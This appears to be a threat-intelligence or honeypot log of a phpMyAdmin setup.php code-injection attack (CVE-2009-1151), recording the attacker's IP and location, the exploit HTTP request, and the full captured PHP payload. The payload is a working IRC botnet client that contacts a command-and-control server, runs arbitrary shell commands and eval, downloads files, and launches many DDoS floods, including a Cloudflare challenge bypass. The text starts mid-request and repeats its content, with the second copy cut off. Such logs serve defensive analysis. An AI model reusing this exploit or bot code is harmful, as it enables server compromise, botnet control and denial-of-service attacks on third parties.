te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=61bd6ddddc4a7aa715855e90d8f9c2ee&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A29%3A%22ftp%3A%2F%2F195%2E154%2E86%2E34%2Fpub%2Fx%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: b4e8a307ebdedcc21fffdd8628b2d881
Type: text/x-php
Size: 37412
URL: ftp://195.154.86.34/pub/x.php
<?php
$cfg = array(
"server" => "195.154.86.34",
"port" => "6969",
"key" => "",
"prefix" => "VNSTAT|",
"maxrand" => "8",
"chan" => "#b0atn3t",
"trigger" => ".",
"hostauth" => "*"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2Bitch Got Nulled!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2UdpFlood Started!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2UdpFlood Finished!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
62.4.27.96
Dest. port: 80
Time: 19/08/2019 23:11:09
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS12876 ONLINE S.A.S.
Location: Île-de-France, Vitry-sur-Seine (zipcode 94400)
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 238
cookie2: $Version="1"
Host: 28.34.203.167
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://28.34.203.167/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=057cc0957a214ba23a3b4d124f889ac2
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=61bd6ddddc4a7aa715855e90d8f9c2ee&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A29%3A%22ftp%3A%2F%2F195%2E154%2E86%2E34%2Fpub%2Fx%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: b4e8a307ebdedcc21fffdd8628b2d881
Type: text/x-php
Size: 37412
URL: ftp://195.154.86.34/pub/x.php
<?php
$cfg = array(
"server" => "195.154.86.34",
"port" => "6969",
"key" => "",
"prefix" => "VNSTAT|",
"maxrand" => "8",
"chan" => "#b0atn3t",
"trigger" => ".",
"hostauth" => "*"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
